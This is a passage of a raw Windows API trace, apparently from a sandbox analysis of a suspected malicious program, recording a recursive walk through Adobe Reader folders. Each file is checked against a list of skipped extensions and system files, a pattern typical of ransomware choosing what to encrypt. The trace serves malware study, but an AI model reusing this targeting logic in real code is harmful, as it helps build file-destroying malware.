lpString1="ICO", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="CHT", cchCount2=3) returned 1 [0058.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="CHT", cchCount2=3) returned 3 [0058.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="CHT", cchCount2=3) returned 3 [0058.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="CHT", cchCount2=3) returned 3 [0058.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="CHT", cchCount2=3) returned 3 [0058.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="CHT", cchCount2=3) returned 3 [0058.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="DIGSIG.CHT", cchCount2=10) returned 3 [0058.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="DIGSIG.CHT", cchCount2=10) returned 3 [0058.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="DIGSIG.CHT", cchCount2=10) returned 3 [0058.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="DIGSIG.CHT", cchCount2=10) returned 3 [0058.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="DIGSIG.CHT", cchCount2=10) returned 3 [0058.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="DIGSIG.CHT", cchCount2=10) returned 3 [0058.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="DIGSIG.CHT", cchCount2=10) returned 3 [0058.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="DIGSIG.CHT", cchCount2=10) returned 1 [0058.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="DIGSIG.CHT", cchCount2=10) returned 1 [0058.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="DIGSIG.CHT", cchCount2=10) returned 1 [0058.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="DIGSIG.CHT", cchCount2=10) returned 3 [0058.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="DIGSIG.CHT", cchCount2=10) returned 3 [0058.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="DIGSIG.CHT", cchCount2=10) returned 3 [0058.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="DIGSIG.CHT", cchCount2=10) returned 3 [0058.635] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82c62800, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="DVA.CHT", cAlternateFileName="")) returned 1 [0058.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BG85", cchCount1=4, lpString2="CHT", cchCount2=3) returned 1 [0058.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="CHT", cchCount2=3) returned 1 [0058.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="CHT", cchCount2=3) returned 1 [0058.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="CHT", cchCount2=3) returned 3 [0058.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="CHT", cchCount2=3) returned 3 [0058.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="CHT", cchCount2=3) returned 3 [0058.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="CHT", cchCount2=3) returned 3 [0058.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="CHT", cchCount2=3) returned 3 [0058.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="DVA.CHT", cchCount2=7) returned 3 [0058.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="DVA.CHT", cchCount2=7) returned 3 [0058.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="DVA.CHT", cchCount2=7) returned 3 [0058.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="DVA.CHT", cchCount2=7) returned 3 [0058.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="DVA.CHT", cchCount2=7) returned 3 [0058.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="DVA.CHT", cchCount2=7) returned 3 [0058.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="DVA.CHT", cchCount2=7) returned 3 [0058.637] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82ec3e00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1600, dwReserved0=0x0, dwReserved1=0x0, cFileName="eBook.CHT", cAlternateFileName="")) returned 1 [0058.637] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82c3c6a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x7400, dwReserved0=0x0, dwReserved1=0x0, cFileName="EScript.CHT", cAlternateFileName="")) returned 1 [0058.637] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82c62800, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="IA32.CHT", cAlternateFileName="")) returned 1 [0058.637] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7db99d60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x9400, dwReserved0=0x0, dwReserved1=0x0, cFileName="makeaccessible.CHT", cAlternateFileName="MAKEAC~1.CHT")) returned 1 [0058.637] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d618a80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xda00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Multimedia.CHT", cAlternateFileName="MULTIM~1.CHT")) returned 1 [0058.637] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d9f6e40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x0, dwReserved1=0x0, cFileName="pddom.CHT", cAlternateFileName="")) returned 1 [0058.637] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82c62800, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4e000, dwReserved0=0x0, dwReserved1=0x0, cFileName="PPKLITE.CHT", cAlternateFileName="")) returned 1 [0058.637] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7f876820, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xe0e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="RdLang32.CHT", cAlternateFileName="")) returned 1 [0058.637] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82fce7a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadOutLoud.CHT", cAlternateFileName="READOU~1.CHT")) returned 1 [0058.637] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d984a20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="reflow.CHT", cAlternateFileName="")) returned 1 [0058.637] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7da8f3c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x3200, dwReserved0=0x0, dwReserved1=0x0, cFileName="SaveAsRTF.CHT", cAlternateFileName="SAVEAS~1.CHT")) returned 1 [0058.638] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82c62800, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x3800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Search.CHT", cAlternateFileName="")) returned 1 [0058.638] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82c62800, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="SendMail.CHT", cAlternateFileName="")) returned 1 [0058.638] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f24da0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81f971c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81f971c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 1 [0058.638] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\Services\\*.*", lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f24da0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81f971c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81f971c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa40 [0058.638] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f24da0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81f971c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81f971c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.639] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81f971c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x893f, dwReserved0=0x0, dwReserved1=0x0, cFileName="DEXShare.asfx", cAlternateFileName="DEXSHA~1.ASF")) returned 1 [0058.639] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81f24da0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xe4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services.asfx", cAlternateFileName="SERVIC~1.ASF")) returned 1 [0058.639] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81f24da0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xe4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services.asfx", cAlternateFileName="SERVIC~1.ASF")) returned 0 [0058.639] FindClose (in: hFindFile=0x69aa40 | out: hFindFile=0x69aa40) returned 1 [0058.639] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7ddfb360, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Spelling.CHT", cAlternateFileName="")) returned 1 [0058.639] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7f4be5c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="updater.CHT", cAlternateFileName="")) returned 1 [0058.639] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82c62800, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Weblink.CHT", cAlternateFileName="")) returned 1 [0058.639] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82c62800, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Weblink.CHT", cAlternateFileName="")) returned 0 [0058.639] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.639] FindNextFileW (in: hFindFile=0x69a9c0, lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d618a80, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x82fce7a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x82fce7a0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh_TW", cAlternateFileName="")) returned 0 [0058.639] FindClose (in: hFindFile=0x69a9c0 | out: hFindFile=0x69a9c0) returned 1 [0058.639] FindNextFileW (in: hFindFile=0x697930, lpFindFileData=0x18ed34 | out: lpFindFileData=0x18ed34*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81e1a400, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x59de0, dwReserved0=0x0, dwReserved1=0x0, cFileName="logsession.dll", cAlternateFileName="LOGSES~1.DLL")) returned 1 [0058.640] FindNextFileW (in: hFindFile=0x697930, lpFindFileData=0x18ed34 | out: lpFindFileData=0x18ed34*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81df42a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4d1e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LogTransport2.exe", cAlternateFileName="LOGTRA~1.EXE")) returned 1 [0058.640] FindNextFileW (in: hFindFile=0x697930, lpFindFileData=0x18ed34 | out: lpFindFileData=0x18ed34*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d618a80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xb9808, dwReserved0=0x0, dwReserved1=0x0, cFileName="Onix32.dll", cAlternateFileName="")) returned 1 [0058.640] FindNextFileW (in: hFindFile=0x697930, lpFindFileData=0x18ed34 | out: lpFindFileData=0x18ed34*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x802e0860, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x14ba0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PDFPrevHndlr.dll", cAlternateFileName="PDFPRE~1.DLL")) returned 1 [0058.640] FindNextFileW (in: hFindFile=0x697930, lpFindFileData=0x18ed34 | out: lpFindFileData=0x18ed34*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x80541e60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x724ee, dwReserved0=0x0, dwReserved1=0x0, cFileName="PDFSigQFormalRep.pdf", cAlternateFileName="PDFSIG~1.PDF")) returned 1 [0058.640] FindNextFileW (in: hFindFile=0x697930, lpFindFileData=0x18ed34 | out: lpFindFileData=0x18ed34*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x80600540, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x18dd88, dwReserved0=0x0, dwReserved1=0x0, cFileName="pe.dll", cAlternateFileName="")) returned 1 [0058.640] FindNextFileW (in: hFindFile=0x697930, lpFindFileData=0x18ed34 | out: lpFindFileData=0x18ed34*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x83529920, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x41a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="piaglbreakfinder.dll", cAlternateFileName="PIAGLB~1.DLL")) returned 1 [0058.640] FindNextFileW (in: hFindFile=0x697930, lpFindFileData=0x18ed34 | out: lpFindFileData=0x18ed34*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cfb2f60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x82ff4900, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x82ff4900, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="plug_ins", cAlternateFileName="")) returned 1 [0058.640] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\*.*", lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cfb2f60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x82ff4900, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x82ff4900, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69a9c0 [0058.641] FindNextFileW (in: 